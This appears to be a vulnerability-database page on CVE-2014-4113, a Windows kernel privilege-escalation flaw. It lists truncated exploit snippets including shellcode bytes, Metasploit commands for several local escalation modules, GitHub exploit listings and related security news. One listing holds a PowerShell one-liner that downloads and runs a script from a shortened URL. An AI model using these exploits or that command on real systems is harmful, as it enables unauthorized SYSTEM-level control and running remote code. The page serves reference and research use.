CVE-2014-4113

Published: 15/10/2014
Updated: 12/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 866
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Exploits

#include "hdh" // EDB Note ~ Download: github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , ...

Sources: labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf github.com/sam-b/CVE-2014-4113 EDB Mirror: www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf Trigger and exploit code for CVE-2014-4113: github.com/offensive-security/exploitdb ...

# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com # EDB Note: ...

## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows ...

Mailing Lists

This Metasploit module exploits a NULL Pointer Dereference in win32k.sys; the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This Metasploit module has been tested successfully on Windows XP SP3, Wind ...

This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string ...

This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM; however, once achieving a shell, one can easily use incognito to impersonate the token ...

Microsoft Windows versions 8.0 and 8.1 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 ...

Metasploit Modules

Windows TrackPopupMenu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys; the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 (32-bit), and also on Windows 7 SP1 and Windows 2008 R2 SP1 (64-bit).

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show targets
    ...targets...
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > show options
    ...show and set options...
msf exploit(ms14_058_track_popup_menu) > exploit

Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.

msf > use exploit/windows/local/ms16_075_reflection_juicy
msf exploit(ms16_075_reflection_juicy) > show targets
    ...targets...
msf exploit(ms16_075_reflection_juicy) > set TARGET <target-id>
msf exploit(ms16_075_reflection_juicy) > show options
    ...show and set options...
msf exploit(ms16_075_reflection_juicy) > exploit

Windows Net-NTLMv2 Reflection DCOM/RPC

Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.

msf > use exploit/windows/local/ms16_075_reflection
msf exploit(ms16_075_reflection) > show targets
    ...targets...
msf exploit(ms16_075_reflection) > set TARGET <target-id>
msf exploit(ms16_075_reflection) > show options
    ...show and set options...
msf exploit(ms16_075_reflection) > exploit

Github Repositories

Exploit-CVE-2014-4113 CVE-2014-4113 is a Local & Privilege Escalation Exploit. You can get the SYSTEM privilege. Supported platform: x86; Windows XP and Windows 7. Usage: open cmd.exe, change to the directory containing the program, and run the following command: cve-2014-4113.exe [target program name]; for example: cve-2014-4113.exe calc.exe

CVE-2014-4113 PowerShell CVE-2014-4113 x64 Windows Only iex (New-Object Net.WebClient).DownloadString('bit.ly/1qosbJH')

CVE-2014-4113 Trigger and exploit code for CVE-2014-4113

cveXXXX poc/exp add cve-2014-4113 win7x64

AWE/OSEE Preparation Blog addaxsoft.com/blog/offensive-security-advanced-windows-exploitation-awe-osee-review/ infosecflash.com/2018/11/04/my-awe-experience/ trickster0.wordpress.com/2018/10/27/awe-course-review-by-offensive-security/ www.jscybersec.io/blogpage/Offensive-Security-Exploitation-Expert-OSEE Public Reference Materials by Module Modu

Windows stack overflows Stack Base Overflow Articles + Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] + Writing Stack Based Overflows on Windows - by Nish Bhalla [2005] + Stack Smashing as of Today - by Hagen Fritsch [2009] + SMASHING C++ VPTRS - by rix [2000] ## Windows heap overflows Heap Base Overflow Articles + Third Generat

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

CVE Here are resources for some vulnerabilities I have reproduced; feel free to download them. The reproduction process for each vulnerability is documented on my blog and on CSDN; discussion is welcome.

awesome-windows-security-development Forked from ExpLife/awesome-windows-kernel-security-development, but he deleted it. Welcome to add a project or something to the list (please use issues). windows kernel driver with c++ runtime github.com/ExpLife/DriverSTL github.com/sysprogs/BazisLib github.com/AmrThabet/winSRDF github.com/sidyhe/dxx github.com/zer0m

awesome-windows-kernel-security-development windows kernel driver with c++ runtime github.com/HoShiMin/Kernel-Bridge github.com/wjcsharp/Common github.com/ExpLife/DriverSTL github.com/sysprogs/BazisLib github.com/AmrThabet/winSRDF github.com/sidyhe/dxx github.com/zer0mem/libc github.com/eladraz/XDK

awesome-windows-security-development Forked from ExpLife/awesome-windows-kernel-security-development, but he deleted it. windows kernel driver with c++ runtime github.com/ExpLife/DriverSTL github.com/sysprogs/BazisLib github.com/AmrThabet/winSRDF github.com/sidyhe/dxx github.com/zer0mem/libc github.com/eladraz/XDK github.com

awesome-windows-kernel-security-development pe file format github.com/corkami/pics meltdown/spectre poc github.com/turbo/KPTI-PoC-Collection github.com/gkaindl/meltdown-poc github.com/feruxmax/meltdown github.com/Eugnis/spectre-attack lightweight c++ gui library github.com/zlgopen/awtk github.com/idea4good/GuiLite htt

Project overview: the lifecycle of a Red Team engagement. The full lifecycle covers: reconnaissance, attempting to gain access, persistence, privilege escalation, internal network reconnaissance, lateral movement, data analysis (with further persistence established on that basis), and cleaning up and withdrawing once all activity is finished. Related resource list: mitre-attack.github.io/ MITRE, a technology organization,

Project overview: reconnaissance, attempting to gain access, persistence, privilege escalation, internal network reconnaissance, lateral movement, data analysis (with further persistence established on that basis), and covering tracks. address | introduce | -|-|- name | description | Security-related resource list: arxiv.org Cornell University open-access documents github.com/sindresorhus/awesome

Project overview: reconnaissance, attempting to gain access, persistence, privilege escalation, internal network reconnaissance, lateral movement, data analysis (with further persistence established on that basis), and covering tracks. Security-related resource list: arxiv.org Cornell University open-access documents github.com/sindresorhus/awesome the awesome series www.owasp.org.cn/owasp-pr

Recent Articles

50k Servers Infected with Cryptomining Malware in Nansh0u Campaign
Threatpost • Lindsey O'Donnell • 29 May 2019

Up to 50,000 servers were infected over the past four months as part of a high-profile cryptojacking campaign, believed to be orchestrated by Chinese-language adversaries.
Researchers with Guardicore Labs, who disclosed the campaign Wednesday, said that the Nansh0u campaign (named due to a text file string in the attacker's servers being called Nansh0u) is "not another run-of-the-mill mining attack."
The cryptomining malware, which targets an open source cryptocurrency called T...

Nansh0u Miner Attack Infects 50K MS-SQL, PHPMyAdmin Servers
BleepingComputer • Sergiu Gatlan • 29 May 2019

More than 50,000 MS-SQL and PHPMyAdmin servers were compromised by Chinese hackers and used to surreptitiously mine for TurtleCoin as part of a large-scale cryptojacking campaign dubbed Nansh0u.
The campaign was detected during early April and it started as far back as February 26, targeting servers located all over the world and belonging to companies from a wide range of industry sectors, "with over seven hundred new victims per day."
"During our investigation, we found 20 ve...

Researchers Crack Furtim, SFG Malware Connection
Threatpost • Tom Spring • 18 Jul 2016

New research is challenging what security researchers know about Furtim, a new malware strain that has been compared to Stuxnet because of its believed targeting of industrial controls in energy companies.
According to security experts at Damballa, Furtim and the recently discovered SFG malware are one and the same, only varying by a few lines of code that include the HTTP header information.
The research clarifies earlier investigations that distinguished Furtim and SFG as clos...

Malware Dropper Built to Target European Energy Company
Threatpost • Michael Mimoso • 12 Jul 2016

A malware dropper with designs on specific targets was found in a private underground forum and is likely the predecessor to the Furtim malware that was uncovered in May.
Researchers at SentinelOne today published a report that says the dropper sample they investigated, which they’re calling SFG, was built to target at least one unnamed European energy company. The report says the dropper is likely the work of a state-sponsored group and is used as the first stage of targeted attacks.

Zero-day hacking group resorts to UNICORN SMUT-SLINGING
The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks.
The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers.
That group had begun spewing spear-phishing emails ...

Two Patched Zero Days Targeting Windows Kernel
Threatpost • Chris Brook • 15 Oct 2014

After they were patched in yesterday’s round of Patch Tuesday security bulletins, security firms have begun to peel back the layers on two zero-day vulnerabilities that are being used in limited, targeted attacks against Microsoft’s Windows Kernel.
According to FireEye, one of the firms that conducted research on both of the vulnerabilities, the flaws can lead to elevation of privilege if left unpatched. Both vulnerabilities are being used in attacks against some major corporations, t...

Microsoft Security Updates October 2014
Securelist • Kurt Baumgartner • 14 Oct 2014

Update (2014.10.15) – administrative notes for preparation… Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig; for some it was ~200 MB. Also, this cycle likely requires everyone to reboot to complete.
*******
This morning was possibly one of the most information rich in the history of Microsoft’s patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog...